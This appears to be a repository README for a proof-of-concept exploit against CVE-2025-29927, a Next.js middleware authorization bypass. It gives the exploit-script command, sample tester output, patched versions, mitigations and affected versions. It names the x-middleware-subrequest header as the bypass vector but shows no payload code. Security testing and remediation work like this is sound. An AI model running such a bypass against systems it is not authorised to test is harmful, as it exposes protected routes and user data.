This repository contains a proof of concept (POC) for CVE-2025-29927, a critical vulnerability in Next.js that allows attackers to bypass authorization checks implemented in middleware.
- Running the POC Application
- Using the Exploit Script
- How to Fix the Vulnerability
- Vulnerability Details
This Next.js application demonstrates the vulnerability with a protected dashboard route.
- Clone the repository
- Install and run:
npm install npm run build npm run start
- Access http://localhost:3000 in your browser
- Try accessing the protected dashboard at /dashboard
The exploit script can test any Next.js application for this vulnerability.
npm run exploit <target-url>npm run exploit http://localhost:3000/dashboardThe exploit tool:
- Takes a target URL as input
- Makes a normal request to check if the route is protected
- Attempts to bypass middleware using the
x-middleware-subrequestheader - Compares responses to determine vulnerability
=== Next.js CVE-2025-29927 Middleware Bypass Tester ===
Target: http://localhost:3000/dashboard
Testing vulnerability...
Normal request status: 307
Bypass request status: 200
⚠️ VULNERABLE
The route is protected but accessible with the bypass headerA fix implementation is available in the how-to-fix branch.
-
Update Next.js Version (Recommended)
- Update to one of these patched versions:
- Next.js 15.x → 15.2.3
- Next.js 14.x → 14.2.25
- Next.js 13.x → 13.5.9
- Next.js 12.x → 12.3.5
- Update to one of these patched versions:
-
Implement Secondary Validation
- Add authentication checks in your API routes/pages
- Don't rely solely on middleware for security
=== Next.js CVE-2025-29927 Middleware Bypass Tester ===
Target: http://localhost:3000/dashboard
Testing vulnerability...
Making request without bypass header...
Making request with bypass header...
Normal request status: 307
Bypass request status: 307
✓ NOT VULNERABLE - Protected Route
The route is protected and the bypass attempt was unsuccessful
Normal request redirected to: /
Bypass request redirected to: /- CVE ID: CVE-2025-29927
- Affected Versions:
- 13.0.0 - 13.5.8
- 14.0.0 - 14.2.24
- 15.0.0 - 15.2.2
- 11.1.4 - 12.3.4
Next.js uses an internal header x-middleware-subrequest to prevent recursive requests. This vulnerability allows attackers to bypass middleware security checks by manipulating this header.
- Unauthorized access to protected routes
- Bypass of authentication checks
- Circumvention of security middleware
- Self-hosted Next.js applications using Middleware
Want to go further? This CVE is implemented as a flag in OSS OopsSec Store, a deliberately vulnerable lab designed for offensive security training.
👉 Try the challenge here → kOaDT/oss-oopssec-store
This tool is provided for educational and testing purposes only. Only use this tool on systems you own or have explicit permission to test.